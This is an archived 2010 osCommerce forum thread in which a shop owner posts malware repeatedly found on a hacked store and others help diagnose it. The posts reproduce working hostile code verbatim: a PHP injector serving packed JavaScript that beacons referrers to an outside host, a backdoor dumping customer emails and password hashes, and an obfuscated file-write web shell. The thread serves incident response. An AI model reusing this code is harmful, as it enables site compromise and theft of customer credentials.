deirossiteam Posted August 26, 2010 Posted August 26, 2010 My application top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR security pro, HT access protection, deleted the admin file manager... yet as soon as i clean up the code, it reappears eventually. I have changed the passwords, I should be the only one with access to the site. Here is what the malicious code looks like. /**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc4LjkoXCc8MiBhPSJiOi8vNy42LzMvPzQ9NSZjPWQmZz1pJms9aiIgaD0iMSIgZT0iMSIgZj0iMCI+PC8yPlwnKTsnLDIxLDIxLCd8fGlmcmFtZXxjYXRlZ29yeXxzaG93dG9waWN8c3NsfGlufHNhZmVyZXN1bHR8ZG9jdW1lbnR8d3JpdGV8c3JjfGh0dHB8ZG9uZXxzbmR8aGVpZ2h0fGZyYW1lYm9yZGVyfGdpZHx3aWR0aHwxNDV8ZW5hYmxlZHxkYicuc3BsaXQoJ3wnKSwwLHt9KSk7ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCcxLjYoIjw3IDg9XCc1Oi8vMi40LjMvOS8/YT1mJmc9IisxLmUrIlwnIGQ9XCcwXCcgYj1cJzBcJyBjPVwnMFwnPiIpOycsMTcsMTcsJ3xkb2N1bWVudHxncm9vdmUwMXxjY3xjb3xodHRwfHdyaXRlfGltZ3xzcmN8aW1hZ2VzfGh8aGVpZ2h0fGJvcmRlcnx3aWR0aHxyZWZlcnJlcnw2NXxhYmMnLnNwbGl0KCd8JyksMCx7fSkpOzwvc2NyaXB0Pg== end**/ $__name = md5($_SERVER['HTTP_HOST']); $reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)"; if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) { $date = date("D, j M Y 00:00:00", time()+60*60*24*30); $cookie = time().".".rand(1111111, 9999999); $set_js = @setcookie ($__name, $cookie, time()+60*60*24*30); if(!$set_js) echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>'; $__content = file_get_contents(__FILE__); preg_match("#\*start(.*?)end\*#is", $__content, $__m); if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) { echo base64_decode($__m[1]); } elseif(isset($__m[1]) and trim($__m[1])!="") { echo $__m[1]; } } It is normally inserted right after the opening <?php Any ideas? Anything I should check for? Thanks for you help in advance.
Guest Posted August 26, 2010 Posted August 26, 2010 Kavon, Ok, now that your in the correct forum. Have you made the security changes to your admin files as suggested here ? http://www.oscommerce.com/forums/index.php?showtopic=340995 And also made the security changes as outlined in this thread ? http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor. Check your hosting account for unknown files. Files with double extensions (file.html.php) or other anomalies. Chris
deirossiteam Posted August 26, 2010 Author Posted August 26, 2010 I did find a file mhp.php in my catalog/images directory with the following code: <?php $p=$_REQUEST['p']; if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die (''); if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']); echo "#mhpver11"."\n"; //mail hash parser oscommerce include "../includes/database_tables.php"; include "../includes/configure.php"; $link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect"); mysql_select_db(DB_DATABASE); $result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS); while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { $l = $line['customers_email_address'].":".$line['customers_password']; if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."\n"; } ?> Would this be something aiding the hacker? Kavon, Ok, now that your in the correct forum. Have you made the security changes to your admin files as suggested here ? http://www.oscommerce.com/forums/index.php?showtopic=340995 And also made the security changes as outlined in this thread ? http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor. Check your hosting account for unknown files. Files with double extensions (file.html.php) or other anomalies. Chris
♥FWR Media Posted August 26, 2010 Posted August 26, 2010 People always look to osCommerce when they get hacked but often it is not anything to do with osCommerce at all. If the host server is vulnerable they ( the hackers ) can hack a single site on the server and once achieved can arbitrarily hack the rest of the sites on the server where permissions allow. Most of the "hack" posts I see on this forum tend to be host related, just my opinion. Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls KissMT Dynamic SEO Meta & Canonical Header Tags KissER Error Handling and Debugging KissIT Image Thumbnailer Security Pro - Querystring protection against hackers ( a KISS contribution ) If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
Guest Posted August 27, 2010 Posted August 27, 2010 My application top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR security pro, HT access protection, deleted the admin file manager... yet as soon as i clean up the code, it reappears eventually. I have changed the passwords, I should be the only one with access to the site. Here is what the malicious code looks like. /**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc4LjkoXCc8MiBhPSJiOi8vNy42LzMvPzQ9NSZjPWQmZz1pJms9aiIgaD0iMSIgZT0iMSIgZj0iMCI+PC8yPlwnKTsnLDIxLDIxLCd8fGlmcmFtZXxjYXRlZ29yeXxzaG93dG9waWN8c3NsfGlufHNhZmVyZXN1bHR8ZG9jdW1lbnR8d3JpdGV8c3JjfGh0dHB8ZG9uZXxzbmR8aGVpZ2h0fGZyYW1lYm9yZGVyfGdpZHx3aWR0aHwxNDV8ZW5hYmxlZHxkYicuc3BsaXQoJ3wnKSwwLHt9KSk7ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCcxLjYoIjw3IDg9XCc1Oi8vMi40LjMvOS8/YT1mJmc9IisxLmUrIlwnIGQ9XCcwXCcgYj1cJzBcJyBjPVwnMFwnPiIpOycsMTcsMTcsJ3xkb2N1bWVudHxncm9vdmUwMXxjY3xjb3xodHRwfHdyaXRlfGltZ3xzcmN8aW1hZ2VzfGh8aGVpZ2h0fGJvcmRlcnx3aWR0aHxyZWZlcnJlcnw2NXxhYmMnLnNwbGl0KCd8JyksMCx7fSkpOzwvc2NyaXB0Pg== end**/ $__name = md5($_SERVER['HTTP_HOST']); $reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)"; if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) { $date = date("D, j M Y 00:00:00", time()+60*60*24*30); $cookie = time().".".rand(1111111, 9999999); $set_js = @setcookie ($__name, $cookie, time()+60*60*24*30); if(!$set_js) echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>'; $__content = file_get_contents(__FILE__); preg_match("#\*start(.*?)end\*#is", $__content, $__m); if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) { echo base64_decode($__m[1]); } elseif(isset($__m[1]) and trim($__m[1])!="") { echo $__m[1]; } } It is normally inserted right after the opening <?php Any ideas? Anything I should check for? Thanks for you help in advance. Here is the decode for that top line maybe some can tell us what it is. <script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script Thanks Bo
deirossiteam Posted September 9, 2010 Author Posted September 9, 2010 Still having problems :( I've found this code in my product listing module: <?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?><?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?> Thanks! Here is the decode for that top line maybe some can tell us what it is. <script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script Thanks Bo
web-project Posted September 10, 2010 Posted September 10, 2010 Most of the "hack" posts I see on this forum tend to be host related, just my opinion. correct, 100% agree on it. majority web hosts normally have 1000 websites on the same server and they don't care about websites or server security!!!!!!! Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues. Any issues with oscommerce, I am here to help you.
Guest Posted September 12, 2010 Posted September 12, 2010 Still having problems :( I've found this code in my product listing module: <?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?><?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?> Thanks! If you have a clean backup on your pc unzip in and compare files on your pc to the ones on your server. I removed this one from a clients server last week. There was at 16 infected files. Bo
WeWatch Posted September 15, 2010 Posted September 15, 2010 Here is the decode for that top line maybe some can tell us what it is. <script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script Thanks Bo It deobfuscates to this: document.write("<img src='http://groove01.co.cc/images/?h=65&abc="+document.referrer+"' width='0' height='0' border='0'>"); We Watch Your Website - so you don't have to! no outside links allowed in signature!
♥mdtaylorlrim Posted September 15, 2010 Posted September 15, 2010 Still having problems :( My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all. Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to because you can have hidden files not displayed by ftp programs... Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it. Then restore you backup files. They are clean, right? Then do all those security necessities. ALL OF THEM. Only then remove the password on the root directory and make your shop visible to the world. You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day and any further successful hacks would almost surely be attributable to the host. Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
Guest Posted September 15, 2010 Posted September 15, 2010 My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all. Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to because you can have hidden files not displayed by ftp programs... Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it. Then restore you backup files. They are clean, right? Then do all those security necessities. ALL OF THEM. Only then remove the password on the root directory and make your shop visible to the world. You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day and any further successful hacks would almost surely be attributable to the host. Yes it is the answer some of the time, but if the bug is on the server site you have just wasted your time.
♥mdtaylorlrim Posted September 15, 2010 Posted September 15, 2010 Yes it is the answer some of the time, but if the bug is on the server site you have just wasted your time. No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct? Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
Guest Posted September 15, 2010 Posted September 15, 2010 No, you have positively identified it as a host problem and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct? All is well with me mine is secure and have no break ends, but others are not so lucky. If I am working on someones I usually prefer to find the problem and figure out how they got in. Besides half the people with a bug don't have a backup up to date backup in play to work with. I have plenty of backups and redirects if needed. Just saying some people don't have the option. Bo
guigs Posted September 21, 2010 Posted September 21, 2010 I have the same problem as described in comment #6. Have you found the cause of this security problem? Still having problems :( I've found this code in my product listing module: <?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?><?php if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)); if(isset($_POST['update']) AND !empty($_POST['path'])) { $filename = $_POST['path']; $somecontent = base64_decode($_POST['update']); if (!$handle = fopen($filename, 'w')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)"; fclose($handle); exit(); } ?> Thanks!
cannuck1964 Posted September 22, 2010 Posted September 22, 2010 The server may have been hacked. This generally means that there are shell scripts on the server which will just redo the back door when you have removed the effected code. This also means that the server is compromised and depending on the severity can mean that the entire kernel is as well. I have gone though this before, and is a huge headache. Generally you can delete to your hearts content, restore backups and everything else mentioned here, but due to the compromise, the hack will just reappear. I have seen files with the exact same code modified (removed the offending code) then 1/2 hr later the code reappears and the file date set to two years previously. Thus no file tracking on date changes was seen. This occurred over and over, even after removal of all of the code from the site. Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed. cheers Peter McGrath ----------------------------- See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
cannuck1964 Posted September 22, 2010 Posted September 22, 2010 A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel. This vulnerability was found to affect a significant number of servers. CentOS has released a new kernel that includes a patch for this exploit. There is currently not a way to patch a server that has already been exploited. If this patch is not applied and the server is exploited the server will need to be re-imaged and content restored from backups. This is a report on the issue and the severity..... For details about the exploit: https://access.redhat.com/kb/docs/DOC-40265 For details about the patch: https://rhn.redhat.com/errata/RHSA-2010-0704.html cheers and hope this helps Peter McGrath ----------------------------- See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
Dennisra Posted September 22, 2010 Posted September 22, 2010 Would you be more specific about this? Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed. cheers
cannuck1964 Posted September 22, 2010 Posted September 22, 2010 Would you be more specific about this?Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above.... cheers Peter McGrath ----------------------------- See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
Dennisra Posted September 22, 2010 Posted September 22, 2010 The links are for Red Hat Enterprise Linux operating system. You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk? Not sure what you mean, there is a new release for the kernel that needs to be applied, you can read more about this at the links found above.... cheers
cannuck1964 Posted September 22, 2010 Posted September 22, 2010 The links are for Red Hat Enterprise Linux operating systemCorrect. I use redhat on my servers, and this is related to me, but then many servers out there use the exact same set up. You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk? A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel This does not just put osCommerce at risk, rather it puts the entire domain / server at risk. Due to the fact that osCommerce is an e commerce platform, they are targeted more so then a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over... Peter McGrath ----------------------------- See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
Dennisra Posted September 22, 2010 Posted September 22, 2010 I am failing somehow to get through to you. I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point. I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating? "Recently an exploit has been found that servers (Apache) must be updated to block" Thank you. Correct. I use redhat on my servers, and this is related to me, but then many servers out there use the exact same set up. A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel This does not just put osCommerce at risk, rather it puts the entire domain / server at risk. Due to the fact that osCommerce is an e commerce platform, they are targeted more so then a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over...
cannuck1964 Posted September 22, 2010 Posted September 22, 2010 I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point. This is the point. I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating? Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there, if based on Linux then all use the APACHE WEB SERVER. APACHE and linux are not the same thing, Apache is like a plug in to the server, it allows for the kernel to operate as a server, linux would still work fine without Apache, just would not act as a server is all. So, if your server ius using Red Hat AND is based on 64 bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, Suse or other Linux releases which maybe based on the CentOS 5 Apache release (or others, that may have the same vulnerability ). cheers Peter McGrath ----------------------------- See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
Dennisra Posted September 22, 2010 Posted September 22, 2010 Yes, of course. You are simply stating the obvious (However, some it is incorrect but I am not going there.) but failing to answer the one question I keep asking time and time again. I think it's prudent that I just give up at this point. Have a good day! This is the point. Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there, if based on Linux then all use the APACHE WEB SERVER. APACHE and linux are not the same thing, Apache is like a plug in to the server, it allows for the kernel to operate as a server, linux would still work fine without Apache, just would not act as a server is all. So, if your server ius using Red Hat AND is based on 64 bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, Suse or other Linux releases which maybe based on the CentOS 5 Apache release (or others, that may have the same vulnerability ). cheers
Recommended Posts
Archived
This topic is now archived and is closed to further replies.